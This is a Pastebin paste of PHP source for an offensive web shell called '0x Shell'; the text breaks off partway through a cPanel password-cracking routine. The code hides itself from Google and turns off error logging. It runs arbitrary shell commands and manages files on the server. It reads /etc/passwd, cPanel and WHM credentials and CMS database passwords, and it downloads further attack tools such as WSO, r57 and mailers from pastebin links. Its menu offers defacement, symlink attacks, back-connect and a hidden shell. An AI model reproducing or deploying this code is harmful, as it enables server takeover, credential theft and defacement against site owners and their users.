Sl4ckerc0de

Untitled

May 30th, 2019
16,449
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 118.29 KB | None | 0 0
  1. <?php
  2.  
  3. // 0x1999 Private Shell
  4. // Use your own risk
  5. // Hard coded by 0x1999
  6.  
  7. // Start Bots Locked
  8. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {header('HTTP/1.0 404 Not Found');exit;}
  9. // End //Bots Locked
  10.  
  11. // Start configuration
  12.  
  13. $shell_name = '0x Shell';
  14. $shell_slogan = 'The Next JanCox Shell';
  15. $shell_version = '1.1';
  16. $shell_bypass_security = '0';
  17. $show_error = "0";
  18.  
  19. @session_start();
  20. @ini_set('max_execution_time', 0);
  21. @ini_set('output_buffering', 0);
  22. // @ini_set("allow_url_fopen", 1);
  23. // @ini_set("allow_url_include", 1);
  24. @set_time_limit(0);
  25.  
  26. // @set_magic_quotes_runtime(0);
  27. // End configuration
  28.  
  29. // start init
  30. if ($show_error == "0") {
  31. @error_reporting(0);
  32. @error_log(0);
  33. @ini_set('error_log', null);
  34. @ini_set('log_errors', 0);
  35. @ini_set('display_errors', 0);
  36. } else {
  37. ini_set('display_errors', 1);
  38. ini_set('display_startup_errors', 1);
  39. error_reporting(E_ALL);
  40. }
  41.  
  42. if (!function_exists('posix_getegid')) {
  43. $user = @get_current_user();
  44. $uid = @getmyuid();
  45. $gid = @getmygid();
  46. $group = "?";
  47. } else {
  48. $uid = @posix_getpwuid(posix_geteuid());
  49. $gid = @posix_getgrgid(posix_getegid());
  50. $user = $uid['name'];
  51. $uid = $uid['uid'];
  52. $group = $gid['name'];
  53. $gid = $gid['gid'];
  54. }
  55. if (@is_dir("/home/$user/public_html/")) {
  56. $server_type = "public_html";
  57. } elseif (@is_dir("/var/www/vhosts/")) {
  58. $server_type = "vhost";
  59. } else {
  60. $server_type = "unknown";
  61. }
  62.  
  63. //end init
  64.  
  65. //start config list
  66. $ext = array("v1", "v2", "v3", "wp", "WP", "blog", "client", "clients", "forum", "forums", "home", "new", "old", "site", "portal", "test", "demo", "wordpress", "joomla", "beta", "news", "main", "shop", "mage", "magento", "sites", "cms", "secure", "support", "panel", "public");
  67. $configtype = array(
  68. "/wp-config.php" => "Wordpress",
  69. "/config/koneksi.php" => "Lokomedia",
  70. "/forum/config.php" => "phpBB",
  71. "/sites/default/settings.php" => "Drupal",
  72. "/config/settings.inc.php" => "PrestaShop",
  73. "/app/etc/local.xml" => "Magento",
  74. "/admin/config.php" => "OpenCart",
  75. "/application/config/database.php" => "Ellislab",
  76. "/configuration.php" => "Joomla",
  77. "/submitticket.php" => "WHMCS",
  78. "/config.php" => "OtherConfig",
  79. "/db.php" => "DB",
  80. "/db.inc.php" => "DBInc",
  81. "/database.php" => "Database",
  82. "/includes/config.php" => "Vbulletin",
  83. "/db/config.php" => "DBConfig",
  84. );
  85. //end config list
  86.  
  87. //start head process
  88. if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  89. @ob_clean();
  90. $file = $_GET['file'];
  91. header('Content-Description: File Transfer');
  92. header('Content-Type: application/octet-stream');
  93. header('Content-Disposition: attachment; filename="' . basename($file) . '"');
  94. header('Expires: 0');
  95. header('Cache-Control: must-revalidate');
  96. header('Pragma: public');
  97. header('Content-Length: ' . filesize($file));
  98. readfile($file);
  99. exit;
  100. }
  101. if (isset($_GET['dir']) && ($_GET['dir'] != "")) {
  102. $dir = $_GET['dir'];
  103. chdir($_GET['dir']);
  104. } else {
  105. $dir = getcwd();
  106. }
  107. if (isset($_POST['upload'])) {
  108. if (@copy($_FILES['0xfile']['tmp_name'], "$dir/" . $_FILES['0xfile']['name'] . "")) {
  109. $actx = "<font color=lime>Uploaded!</font> at <i><b>$dir/" . $_FILES['0xfile']['name'] . "</b></i>";
  110. } else {
  111. $actx = "<font color=red>failed to upload file</font>";
  112. }
  113. } else {
  114. $actx = "";
  115. }
  116. //end head process
  117. ?>
  118. <!DOCTYPE html>
  119. <html>
  120. <style stype="text/css">
  121. @import url(https://fonts.googleapis.com/css?family=Abel|Baumans);
  122. body {
  123. background: #101010;
  124. color: #f2f2f2;
  125. font-family: Abel;
  126. font-size: 12px;
  127. }
  128.  
  129. body a {
  130. color: #3467BA;
  131. text-decoration: none;
  132. }
  133.  
  134. body a:hover {
  135. text-decoration: underline;
  136. }
  137.  
  138. #main_content {
  139. border: 1px solid #5C7296;
  140. overflow: hidden;
  141. width: 1000px;
  142. height: auto;
  143. padding: 15px;
  144. margin: 0 auto;
  145. background: #0A0A0A;
  146. border-radius: 6px;
  147. -moz-border-radius: 6px;
  148. -webkit-border-radius: 6px;
  149. }
  150.  
  151. .enabled {
  152. color: #7ACC29;
  153. }
  154.  
  155. .enabled a {
  156. color: #7ACC29;
  157. font-weight: normal;
  158. }
  159.  
  160. .disabled {
  161. color: #CC0000;
  162. }
  163.  
  164. .TableHeader_Name {
  165. width: 400px;
  166. padding: 0px 0px 0px 5px;
  167. height: 25px;
  168. font-family: Abel;
  169. background-color: #282828;
  170. border-top-left-radius: 4px;
  171. -moz-border-top-left-radius: 4px;
  172. -webkit-border-top-left-radius: 4px;
  173. }
  174.  
  175. .TableHeader {
  176. width: 100px;
  177. height: 25px;
  178. font-family: Abel;
  179. text-align: center;
  180. background-color: #282828;
  181. }
  182.  
  183. .TableHeaderoptions {
  184. padding: 0px 0px 0px 15px;
  185. width: 200px;
  186. height: 25px;
  187. font-family: Abel;
  188. background-color: #282828;
  189. border-top-right-radius: 4px;
  190. -moz-border-top-right-radius: 4px;
  191. -webkit-border-top-right-radius: 4px;
  192. }
  193.  
  194. .TableLast {
  195. padding: 0px 0px 0px 15px;
  196. width: 200px;
  197. height: 25px;
  198. font-family: Abel;
  199. background-color: #282828;
  200. border-top-right-radius: 4px;
  201. -moz-border-top-right-radius: 4px;
  202. -webkit-border-top-right-radius: 4px;
  203. }
  204.  
  205. .filesize {
  206. color: green;
  207. text-align: center;
  208. }
  209.  
  210. .filenames a {
  211. font-weight: normal;
  212. text-decoration: none;
  213. }
  214.  
  215. .filenames a:hover {
  216. text-decoration: underline;
  217. }
  218.  
  219. .filetr {
  220. background-color: #080808;
  221. }
  222.  
  223. .filetr:hover {
  224. background-color: #282828;
  225. }
  226.  
  227. #options {
  228. font-weight: 200;
  229. font-family: Abel;
  230. margin-left: 10px;
  231. display: block;
  232. }
  233.  
  234. #title {
  235. font-size: 25px;
  236. font-family: arial;
  237. display: block;
  238. padding: 15px 0px 0px 0px;
  239. }
  240.  
  241. .box {
  242. padding: 10px;
  243. background-color: #292929;
  244. border: 1px solid #3467BA;
  245. height: auto;
  246. width: 970;
  247. border-radius: 6px;
  248. -moz-border-radius: 6px;
  249. -webkit-border-radius: 6px;
  250. }
  251.  
  252. .sembunyi {
  253. display: none;
  254. padding: 0;
  255. margin: 0;
  256. }
  257.  
  258. textarea {
  259. background-color: #010101;
  260. color: #f2f2f2;
  261. border: 1px solid #3467BA;
  262. outline: none;
  263. font-size: 11px;
  264. border-radius: 3px;
  265. -moz-border-radius: 3px;
  266. -webkit-border-radius: 3px;
  267. padding: 5px;
  268. width: 970px;
  269. height: 400px;
  270. }
  271.  
  272. input[type=text],
  273. input[type=password],
  274. input[type=submit],
  275. input[type=button] {
  276. background: #010101;
  277. color: #f2f2f2;
  278. margin: 0 4px;
  279. border: 1px solid #3467BA;
  280. outline: none;
  281. font-size: 11px;
  282. border-radius: 3px;
  283. -moz-border-radius: 3px;
  284. -webkit-border-radius: 3px;
  285. font-family: Abel;
  286. font-size: 12px;
  287. }
  288.  
  289. .viewfile {
  290. background: #EDECEB;
  291. color: #000000;
  292. margin: 4px 2px;
  293. padding: 8px;
  294. border-radius: 3px;
  295. -moz-border-radius: 3px;
  296. -webkit-border-radius: 3px;
  297. border: 1px solid #3467BA;
  298. }
  299.  
  300. select {
  301. color: #f2f2f2;
  302. padding: 0;
  303. margin: 0;
  304. border: 1px solid #3467BA;
  305. outline: none;
  306. font-size: 11px;
  307. border-radius: 3px;
  308. -moz-border-radius: 3px;
  309. -webkit-border-radius: 3px;
  310. background: #010101;
  311. overflow: hidden;
  312. font-family: Abel;
  313. font-size: 12px;
  314. }
  315.  
  316. input[type="file"] {
  317. color: #f2f2f2;
  318. padding: 0;
  319. margin: 0;
  320. border: 1px solid #3467BA;
  321. outline: none;
  322. font-size: 11px;
  323. border-radius: 3px;
  324. -moz-border-radius: 3px;
  325. -webkit-border-radius: 3px;
  326. background: #010101;
  327. overflow: hidden;
  328. font-family: Abel;
  329. font-size: 12px;
  330. }
  331.  
  332. .ndelik {
  333. display: none;
  334. padding: 0;
  335. margin: 0;
  336. }
  337.  
  338. form,
  339. table {
  340. /*display: inline;*/
  341. margin: 0px;
  342. padding: 0px;
  343. }
  344. </style>
  345.  
  346. <script type="text/javascript">
  347. function tukar(lama, baru) {
  348. document.getElementById(lama).style.display = 'none';
  349. document.getElementById(baru).style.display = 'block';
  350. }
  351. </script>
  352.  
  353. <link href="http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&amp;path-prefix=es" rel="icon" type="image/x-icon">
  354.  
  355. <?php
  356.  
  357. $ling = "http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['PHP_SELF'] . "?create";
  358. $dir = str_replace("\\", "/", $dir);
  359. $scdir = explode("/", $dir);
  360. $ds = @ini_get("disable_functions");
  361. $show_ds = (!empty($ds)) ? "<input type='text' name='searchterm' size='30'style='background-color: rgb(41, 41, 41);border: 1px solid rgb(41, 41, 41);height: 12px;color: red;width: 385px;'value='$ds'readonly/>" : "<font color=lime>NONE</font>";
  362. echo "<title>$shell_name</title>";
  363.  
  364. if (isset($_GET['create'])) {
  365. function CreateTools($names, $lokasi)
  366. {
  367. if ($_GET['create'] == $names) {
  368. $a = "" . $_SERVER['SERVER_NAME'] . "";
  369. $b = dirname($_SERVER['PHP_SELF']);
  370. $c = "/0x1/" . $names . ".php";
  371. if (file_exists('0x1/' . $names . '.php')) {
  372. echo '<script type="text/javascript">alert("Done");window.location.href = "0x1/' . $names . '.php";</script> ';
  373. } else {
  374. mkdir("0x1", 0777);
  375. file_put_contents('0x1/' . $names . '.php', file_get_contents($lokasi));
  376. echo ' <script type="text/javascript">alert("Done");window.location.href = "0x1/' . $names . '.php";</script> ';}}
  377. }
  378. CreateTools("wso", "http://pastebin.com/raw/3eh3Gej2");
  379. CreateTools("adminer" . "https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  380. CreateTools("maildump", "http://pastebin.com/raw/JLjrTs40");
  381. CreateTools("injection", "http://pastebin.com/raw/nxxL8c1f");
  382. CreateTools("promailerv2", "http://pastebin.com/raw/Rk9v6eSq");
  383. CreateTools("gamestopceker", "http://pastebin.com/raw/QSnw1JXV");
  384. CreateTools("bukapalapak", "http://pastebin.com/raw/6CB8krDi");
  385. CreateTools("tokopedia", "http://pastebin.com/dvhzWgby");
  386. CreateTools("encodedecode", "http://pastebin.com/raw/wqB3G5eZ");
  387. CreateTools("mailer", "http://pastebin.com/raw/9yu1DmJj");
  388. CreateTools("r57", "http://pastebin.com/raw/G2VEDunW");
  389. CreateTools("tokenpp", "http://pastebin.com/raw/72xgmtPL");
  390. CreateTools("extractor", "http://pastebin.com/raw/jQnMFHBL");
  391. CreateTools("bh", "http://pastebin.com/raw/3L2ESWeu");
  392. CreateTools("dhanus", "http://pastebin.com/raw/v4xGus6X");
  393. }
  394.  
  395. //Start Function
  396. function permissions($file)
  397. {
  398.  
  399. $perms = @fileperms($file);
  400. if (($perms & 0xC000) == 0xC000) {
  401. $info = 's';
  402. } elseif (($perms & 0xA000) == 0xA000) {
  403. $info = 'l';
  404. } elseif (($perms & 0x8000) == 0x8000) {
  405. $info = '-';
  406. } elseif (($perms & 0x6000) == 0x6000) {
  407. $info = 'b';
  408. } elseif (($perms & 0x4000) == 0x4000) {
  409. $info = 'd';
  410. } elseif (($perms & 0x2000) == 0x2000) {
  411. $info = 'c';
  412. } elseif (($perms & 0x1000) == 0x1000) {
  413. $info = 'p';
  414. } else {
  415. $info = 'u';
  416. }
  417. $info .= (($perms & 0x0100) ? 'r' : '-');
  418. $info .= (($perms & 0x0080) ? 'w' : '-');
  419. $info .= (($perms & 0x0040) ?
  420. (($perms & 0x0800) ? 's' : 'x') :
  421. (($perms & 0x0800) ? 'S' : '-'));
  422. $info .= (($perms & 0x0020) ? 'r' : '-');
  423. $info .= (($perms & 0x0010) ? 'w' : '-');
  424. $info .= (($perms & 0x0008) ?
  425. (($perms & 0x0400) ? 's' : 'x') :
  426. (($perms & 0x0400) ? 'S' : '-'));
  427. $info .= (($perms & 0x0004) ? 'r' : '-');
  428. $info .= (($perms & 0x0002) ? 'w' : '-');
  429. $info .= (($perms & 0x0001) ?
  430. (($perms & 0x0200) ? 't' : 'x') :
  431. (($perms & 0x0200) ? 'T' : '-'));
  432. return $info;
  433. }
  434. function UrlLoop($url, $type)
  435. {
  436. $urlArray = array();
  437. $ch = curl_init();
  438. curl_setopt($ch, CURLOPT_URL, $url);
  439. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  440. $result = curl_exec($ch);
  441. $regex = '|<a.*?href="(.*?)"|';
  442. preg_match_all($regex, $result, $parts);
  443. $links = $parts[1];
  444. foreach ($links as $link) {
  445. array_push($urlArray, $link);
  446. }
  447. curl_close($ch);
  448. foreach ($urlArray as $value) {
  449. $lol = "$url$value";
  450. if (preg_match("#$type#is", $lol)) {
  451. echo "$lol\r\n";
  452. }
  453. }
  454. }
  455.  
  456. function anucurl($sites)
  457. {
  458. $ch = curl_init($sites);
  459. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  460. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  461. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  462. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  463. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  464. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  465. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  466. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  467. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  468. $data = curl_exec($ch);
  469. curl_close($ch);
  470. return $data;
  471. }
  472. function clearspace($text)
  473. {
  474. return str_replace(" ", "_", $text);
  475. }
  476. function magicboom($text)
  477. {
  478. if (!get_magic_quotes_gpc()) {
  479. return $text;
  480. }
  481. return stripslashes($text);
  482. }
  483. function ambilKata($param, $kata1, $kata2)
  484. {
  485. if (strpos($param, $kata1) === false) {
  486. return false;
  487. }
  488.  
  489. if (strpos($param, $kata2) === false) {
  490. return false;
  491. }
  492.  
  493. $start = strpos($param, $kata1) + strlen($kata1);
  494. $end = strpos($param, $kata2, $start);
  495. $return = substr($param, $start, $end - $start);
  496. return $return;
  497. }
  498. function ambil_password($link)
  499. {
  500. $pass = "";
  501. $ch = curl_init();
  502. curl_setopt($ch, CURLOPT_URL, $link);
  503. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  504. $ambil = curl_exec($ch);
  505. // $ambil = file_get_contents($link);
  506. if (preg_match("/WordPress/", $ambil)) {
  507. $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\n";
  508. } elseif (preg_match("/JConfig|joomla/", $ambil)) {
  509. $pass .= ambilkata($ambil, "password = '", "'") . "\n";
  510. } elseif (preg_match("/cmsmember/", $ambil)) {
  511. $pass .= ambilkata($ambil, 'dbpasswd = "', '"') . "\n";
  512. } elseif (preg_match("/Magento|Mage_Core/", $ambil)) {
  513. $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\n";
  514. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  515. $pass .= ambilkata($ambil, 'password = "', '"') . "\n";
  516. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  517. $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\n";
  518. } elseif (preg_match("/client/", $ambil)) {
  519. preg_match("/password=(.*)/", $ambil, $pass1);
  520. if (preg_match('/"/', $pass1[1])) {
  521. $pass1[1] = str_replace('"', "", $pass1[1]);
  522. $pass .= $pass1[1] . "\n";
  523. }
  524. } elseif (preg_match("/cc_encryption_hash/", $ambil)) {
  525. $pass .= ambilkata($ambil, "db_password = '", "'") . "\n";
  526. }
  527. return $pass;
  528. }
  529. function w($dir, $perm)
  530. {
  531. if (!is_writable($dir)) {
  532. return "<font color=red>" . $perm . "</font>";
  533. } else {
  534. return "<font color=lime>" . $perm . "</font>";
  535. }
  536. }
  537. function cekjum($kentu)
  538. {
  539.  
  540. // $it = new RecursiveIteratorIterator($kentu,RecursiveDirectoryIterator::SKIP_DOTS);
  541. $it = new RecursiveIteratorIterator
  542. (
  543. new RecursiveDirectoryIterator($kentu)
  544. );
  545. // if($it-> DirectoryIterator::isDot()){
  546. // echo "cok";
  547. // }
  548.  
  549. // $index = array_search('..',$it);
  550. // if($index !== FALSE){
  551. // unset($it[$index]);
  552. // }
  553.  
  554. foreach ($it as $filename) {
  555. $file = realpath(dirname($filename));
  556. if ($file == "..") {
  557. continue;
  558. }
  559. if (is_writable($filename)) {
  560.  
  561. $perm = permissions($file);
  562. $perm = w($file, $perm);
  563. $permd = permissions($filename);
  564. $permd = w($filename, $permd);
  565.  
  566. if (is_dir($filename)) {
  567. if (is_writable($file)) {
  568. echo "[ D ] [$perm]\t\t<a href='?dir=$file'>$file</a><font color='lime'>is writable</font><br>";
  569. }
  570. } else {
  571. if (is_writable($filename)) {
  572. echo "[ F ] [$permd]\t\t<a href='?act=edit&dir=$file&file=$filename'>$filename</a><font color='lime'>is writable</font><br>";
  573. }
  574. }
  575.  
  576. }
  577. }
  578. }
  579. function exe($cmd)
  580. {
  581. if (function_exists('system')) {
  582. @ob_start();
  583. @system($cmd);
  584. $buff = @ob_get_contents();
  585. @ob_end_clean();
  586. return $buff;
  587. } elseif (function_exists('exec')) {
  588. @exec($cmd, $results);
  589. $buff = "";
  590. foreach ($results as $result) {
  591. $buff .= $result;
  592. }
  593. return $buff;
  594. } elseif (function_exists('passthru')) {
  595. @ob_start();
  596. @passthru($cmd);
  597. $buff = @ob_get_contents();
  598. @ob_end_clean();
  599. return $buff;
  600. } elseif (function_exists('shell_exec')) {
  601. $buff = @shell_exec($cmd);
  602. return $buff;
  603. }
  604. }
  605.  
  606. //End Function
  607.  
  608. //start bypasser
  609.  
  610. // $etcpasswd = etcpasswd();
  611.  
  612. if ($_SESSION['etcpasswd']) {
  613. $etcpasswd = $_SESSION['etcpasswd'];
  614. } else {
  615. $etcpasswd = @file_get_contents('/etc/passwd');
  616. if (!$etcpasswd) {
  617. $etcpasswd = exe('cat /etc/passwd');
  618. }
  619. }
  620.  
  621. // end bypasser
  622.  
  623. /////////////////////////////////////
  624. if (!$_SESSION["cekown"] == "pass") {
  625. $own = @file('/etc/trueuserowners');
  626. foreach ($own as $owns) {
  627. $exp = explode(": ", $owns);
  628. $string = trim(preg_replace('/\s+/', ' ', $exp[1]));
  629. if ($string == $user) {
  630. $_SESSION["statusowner"] = "OWNER";
  631. }
  632. if ($exp[0] == $user) {
  633. $_SESSION["statusclientus"] = $exp[0];
  634. $_SESSION["statusclient"] = $exp[1];
  635. }
  636. $_SESSION["cekown"] = "pass";
  637. }
  638. }
  639.  
  640. if ($_SESSION["statusowner"] == "OWNER") {
  641. $trueowner = $_SESSION["statusowner"];
  642. $trueowner = "<font color=lime>$trueowner</font>";
  643. } else {
  644. $trueowner = "<font color=red>error</font>";
  645. }
  646. if ($_SESSION["statusclientus"] == $user) {
  647. $trueuser = $_SESSION["statusclient"];
  648. $trueuser = " <font color=lime>$trueuser</font>";
  649. } else {
  650. $trueuser = "<font color=red>error</font>";
  651. }
  652.  
  653. $sport = $_SERVER['SERVER_PORT'];
  654. $d0mains = @file("/etc/named.conf");
  655. $users = $etcpasswd;
  656. if ($d0mains) {
  657. $count;
  658. foreach ($d0mains as $d0main) {
  659. if (@ereg("zone", $d0main)) {
  660. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  661. flush();
  662. if (strlen(trim($domains[1][0])) > 2) {
  663. flush();
  664. $count++;
  665. }
  666. }
  667. }
  668. $count2 = $count / 2;
  669. } else {
  670. $count2 = "??";
  671. }
  672. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  673. echo "
  674. <body>
  675. <div id='main_content'><span id='title'><font face='Baumans'>$shell_name</font> </span><i>$shell_slogan</i><br><br><div class='box'>
  676. ";
  677. echo '
  678. <table cellspacing="0" cellpadding="0">
  679. <colgroup>
  680. <col style="width: 499px">
  681. <col style="width: 599px">
  682. </colgroup>
  683. <tr>
  684. <td nowrap>Server Name:' . php_uname() . '</td>
  685. <td align="right"><form><div class="select-style">
  686. <select onchange="if (this.value) window.open(this.value);">
  687. <option selected="selected" value=""> <i>Tools Creator </option>
  688. <option value="' . $ling . '=wso"><i>WSO 2.8.1</option>
  689. </select>
  690. <select onchange="if (this.value) window.open(this.value);">
  691. <option selected="selected" value=""> Tools Carder </option>
  692. <option value="' . $ling . '=maildump">Email Dumper</option>
  693. </select></div>
  694. <noscript><input type="submit" value="Submit"></noscript>
  695. </form></td>
  696. </tr>
  697. <tr>
  698. <td>User :<font color=lime>' . $user . '</font> (' . $uid . ') Group : <font color=lime>' . $group . '</font> (' . $gid . ') Owner : (' . $trueowner . ') UserOwner : (' . $trueuser . ')</td>
  699. <td align="right">';
  700. if ($server_type == "public_html") {
  701. if (file_exists('/home/' . $user . '/.my.cnf')) {
  702. $cp = file_get_contents('/home/' . $user . '/.my.cnf');
  703. $cp = ambilkata($cp, 'password="', '"');
  704. echo 'Cpanel : Username <font color="lime">(</font>' . $user . '<font color="lime">)</font> Password <font color="lime">(</font>' . $cp . '<font color="lime">)</font>';
  705. }}
  706. echo '
  707. </td>
  708. </tr>
  709. <tr>
  710. <td>Server IP :<font color=lime>' . gethostbyname($_SERVER["HTTP_HOST"]) . '</font> <span class="enabled"><a href="https://www.bing.com/search?q=IP:' . gethostbyname($_SERVER["HTTP_HOST"]) . '" target="_blank">[BING]</a></span> <span class="enabled"><a href="https://centralops.net/co/domaindossier.aspx?addr=' . gethostbyname($_SERVER["HTTP_HOST"]) . '&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true" target="_blank">[Dossier]</a></span> | Port : <font color=lime>' . $sport . '</font> | Your IP: <font color=lime>' . $_SERVER["REMOTE_ADDR"] . '</font></td>
  711. <td align="right">';
  712. if ($server_type == "public_html") {
  713. if (file_exists('/home/' . $user . '/.accesshash')) {
  714. $whm = file_get_contents('/home/' . $user . '/.accesshash');
  715. $whm = preg_replace('/\s+/', '', $whm);
  716. echo '<input type="text" size="30" value="WHM ' . $user . ':' . $whm . '">';
  717. }}
  718. echo '
  719. </td>
  720. </tr>
  721. <tr>
  722. <td>Server Type : ' . $server_type . ' | Website :<font color=lime> ' . $count2 . ' </font> Domains</td>
  723. </tr>
  724. <tr>
  725. <td>Safe Mode: ' . $sm . '</td>
  726. </tr>
  727. <tr>
  728. <td>Disable Functions:' . $show_ds . '</td>
  729. </tr>
  730. <tr>
  731. <td>Server Software: ' . $_SERVER["SERVER_SOFTWARE"] . ' <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=' . $_SERVER["SERVER_SOFTWARE"] . '&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" target="_blank">[Exploit DB]</a></span>
  732. </td>
  733. </tr>
  734. <tr>
  735. <td>Directory : ';
  736. foreach ($scdir as $c_dir => $cdir) {
  737. echo "<a href='?dir=";
  738. for ($i = 0; $i <= $c_dir; $i++) {
  739. echo $scdir[$i];
  740. if ($i != $c_dir) {
  741. echo "/";
  742. }
  743. }
  744. echo "'>$cdir</a>/";
  745. }
  746. echo "</td>
  747. <td align='right'><form method='post' enctype='multipart/form-data'><input type='file' name='0xfile'><input type='submit' value='upload' name='upload'></form></td>
  748. </tr>
  749. <tr>
  750. <td><form method='post' action='?dir=$dir&do=cmd' style='float: left;'>
  751. Command :
  752. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  753. </form><p></p>
  754. </td>
  755. <td align='right'>" . $actx . "</td>
  756. </tr>
  757. </table></div>";
  758. echo '<a href="?">Home</a> / ';
  759. echo "<a href='?dir=" . $dir . "&do=config'>Config</a> / ";
  760. echo "<a href='?dir=" . $dir . "&do=jump'>Jump</a> / ";
  761. echo "<a href='?dir=" . $dir . "&do=symlink'>Sym</a> / ";
  762. echo "<a href='?dir=" . $dir . "&do=cpanel'>Cpanel</a> / ";
  763. echo "<a href='?dir=" . $dir . "&do=symlink'>Sym</a> / ";
  764. echo "<a href='?dir=" . $dir . "&do=mass_deface'>Mass</a> / ";
  765. echo "<a href='?dir=" . $dir . "&do=mirror'>Mirror</a> / ";
  766. echo "<a href='?dir=" . $dir . "&do=cgi'>Cgi</a> / ";
  767. echo "<a href='?dir=" . $dir . "&do=bc'>BC</a> / ";
  768. echo "<a href='?dir=" . $dir . "&do=about'>About</a> / ";
  769. echo "<a href='?dir=" . $dir . "&do=serverinfo'>Server Info</a> / ";
  770. echo "<a href='?do=deleteme'>Self Remove</a> / ";
  771. echo "<a href='?dir=" . $dir . "&do=ndelikne'>Hidden Shell</a> / ";
  772. echo "<a href='?dir=" . $dir . "&do=crp'>Config ResPass</a> / ";
  773. echo "<a href='?dir=" . $dir . "&do=grabpass'>Config PassGrab</a> / ";
  774. echo "<a href='?dir=" . $dir . "&do=hek'>Deface</a> / ";
  775. echo "<a href='?dir=" . $dir . "&do=cpres'>Cpanel Reset</a> / ";
  776. echo '<hr>';
  777. /////////////////////////////////////
  778. // if(isset($_GET['act']) && ($_GET['act'] == ''))
  779.  
  780. // START TOOLS SCRIPT
  781. if (isset($_GET['act']) && ($_GET['act'] == 'delete')) {
  782. $delete = unlink($_GET['file']);
  783. if ($delete) {
  784. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  785. } else {
  786. $act = "<font color=red>permission denied</font>";
  787. }
  788. echo $act;
  789. } elseif (isset($_GET['act']) && ($_GET['act'] == 'delete_dir')) {
  790. function Delete($path)
  791. {
  792. $path = (substr($path, -1) == '/') ? $path : $path . '/';
  793. $dh = opendir($path);
  794. while (($item = readdir($dh)) !== false) {
  795. $item = $path . $item;
  796. if ((basename($item) == "..") || (basename($item) == ".")) {
  797. continue;
  798. }
  799.  
  800. $type = filetype($item);
  801. if ($type == "dir") {
  802. Delete($item);
  803. } else {
  804. @unlink($item);
  805. }
  806.  
  807. }
  808. closedir($dh);
  809. @rmdir($path);}
  810. $delete_dir = Delete($dir);
  811. $act = "<script>window.location='?dir=" . dirname($dir) . "';</script>";
  812. echo $act;
  813. } elseif (isset($_POST['do_rename'])) {
  814. $rename = rename($_POST['oldname'], "$dir/" . htmlspecialchars($_POST['rename']) . "");
  815. if ($rename) {
  816. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  817. } else {
  818. $act = "<font color=red>permission denied</font>";
  819. }
  820. echo "" . $act . "<br>";
  821. } elseif (isset($_POST['dir_rename'])) {
  822. $dir_rename = rename($dir . "/" . $_POST['oldname'], "" . $dir . "/" . htmlspecialchars($_POST['fol_rename']) . "");
  823. if ($dir_rename) {
  824. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  825. } else {
  826. $act = "<font color=red>permission denied</font>";
  827. }
  828. echo "" . $act . "<br>";
  829. } elseif (isset($_GET['act']) && ($_GET['act'] == 'newfolder')) {
  830. if ($_POST['new_save_folder']) {
  831. $new_folder = $dir . '/' . htmlspecialchars($_POST['newfolder']);
  832. if (!mkdir($new_folder)) {
  833. $act = "<font color=red>permission denied</font>";
  834. } else {
  835. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  836. }
  837. }
  838. echo $act;
  839. } elseif (isset($_GET['act']) && ($_GET['act'] == 'view')) {
  840. if (is_file($_GET['file'])) {
  841. if (!isset($file)) {
  842. $file = magicboom($_GET['file']);
  843. }
  844.  
  845. echo "Filename : <font color=lime>" . basename($_GET['file']) . "</font> [ <a href='?act=view&dir=$dir&file=" . $_GET['file'] . "'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=" . $_GET['file'] . "'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=" . $_GET['file'] . "'>rename</a> ] [ <a href='?act=download&dir=$dir&file=" . $_GET['file'] . "'>download</a> ] [ <a href='?act=delete&dir=$dir&file=" . $_GET['file'] . "'>delete</a> ]<br>";
  846. echo "<div class=\"viewfile\">";
  847. $file = wordwrap(@file_get_contents($file), "240", "\n");
  848. @highlight_string($file);
  849. echo "</div>";
  850. } elseif (is_dir($_GET['view'])) {
  851. echo showdir($dir, $prompt);
  852. }
  853. }
  854.  
  855. //end act
  856.  
  857. elseif (isset($_GET['do']) && ($_GET['do'] == 'cpanel')) {
  858. if ($_POST['crack']) {
  859. $usercp = explode("\r\n", $_POST['user_cp']);
  860. $passcp = explode("\r\n", $_POST['pass_cp']);
  861. $i = 0;
  862. foreach ($usercp as $ucp) {
  863. foreach ($passcp as $pcp) {
  864. if (@mysql_connect('localhost', $ucp, $pcp)) {
  865. if ($_SESSION[$ucp] && $_SESSION[$pcp]) {
  866. } else {
  867. $_SESSION[$ucp] = "1";
